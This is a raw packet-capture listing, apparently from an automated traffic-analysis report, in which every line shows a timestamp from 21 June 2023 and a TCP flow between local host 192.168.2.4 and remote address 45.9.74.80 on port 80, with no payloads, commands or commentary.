                                                                                                  Jun 21, 2023 20:23:59.296281099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296307087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296334028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296360970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296386957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296484947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296509981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296528101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296545029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296561956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296586990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296603918 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296622038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296633959 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296633959 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296634912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296669006 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296669006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296717882 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296849012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296875000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296911955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296936989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296962976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296988010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.297027111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.297164917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.297164917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.297164917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.298521996 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.312935114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.312962055 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.318541050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.319780111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.319808960 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321602106 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321629047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321655989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321676016 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.321679115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321707010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321732998 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321759939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321785927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321813107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321836948 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321858883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.321858883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.321858883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.321858883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.321883917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321918011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321950912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.321988106 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322010994 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322010994 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322204113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322254896 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322288036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322320938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322319984 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322366953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322413921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322432995 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322432995 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322447062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322484016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322518110 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322540998 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322551966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322587013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322614908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322619915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322685957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322702885 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322774887 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322808027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322824001 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.322843075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322880030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322941065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.322988987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323020935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323036909 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323036909 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323052883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323087931 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323122025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323143005 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323143005 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323154926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323189020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323210955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323232889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323266983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323283911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323301077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323338985 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323342085 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323391914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323438883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323470116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323504925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323508024 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323538065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323570967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323605061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323622942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323622942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323638916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323709011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323743105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323774099 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323806047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323827028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323848963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323870897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323905945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323918104 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323918104 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.323939085 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.323990107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324008942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324022055 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324055910 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324059963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324104071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324135065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324167013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324198961 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324229956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324259996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324301958 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324301958 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324301958 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324310064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324342012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324374914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324419975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324454069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324490070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324523926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324525118 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324525118 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324526072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324563026 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324629068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324675083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324723005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324754953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324793100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324831963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324832916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324832916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324832916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324839115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324872017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324904919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324937105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324949026 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.324970007 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.324991941 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325004101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325037003 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325099945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325130939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325186014 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325186014 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325189114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325223923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325257063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325288057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325320005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325354099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325354099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325356007 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325354099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325432062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325476885 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325512886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325546026 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325582981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325614929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325622082 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325622082 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325622082 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325649023 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325681925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325715065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325719118 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325747967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325781107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325841904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325874090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325905085 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325937033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325968027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.325973034 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325973034 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325973988 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.325973988 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326003075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326035976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326037884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326069117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326101065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326122999 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326133013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326165915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326198101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326203108 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326230049 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326262951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326294899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326325893 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326358080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326371908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326371908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326373100 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326390982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326421976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326455116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326488018 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326488018 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326514959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326556921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326590061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326622963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326656103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326714039 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326744080 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326744080 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.326745987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326780081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326812983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326875925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326910019 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326942921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.326975107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327008009 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327052116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327052116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327052116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327052116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327064991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327099085 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327131033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327161074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327163935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327198982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327219009 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327230930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327264071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327296972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327316999 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327328920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327363968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327395916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327429056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327460051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327492952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327524900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327529907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327529907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327531099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327531099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327559948 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327593088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327625990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327640057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327657938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327673912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327692032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327724934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327759027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327790976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327824116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327852011 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327852011 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.327856064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.327889919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.328006983 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.330624104 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.343796968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.343827009 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.344383955 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.347111940 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347140074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347207069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347232103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347258091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347306013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347322941 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.347322941 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.347331047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347356081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347383022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.347393036 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.347652912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353001118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353049040 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353162050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353195906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353228092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353260994 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353295088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353328943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353339911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353339911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353339911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353339911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353363037 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353396893 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353415966 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.353432894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353465080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353498936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353530884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.353564024 CEST804970445.9.74.80192.168.2.4
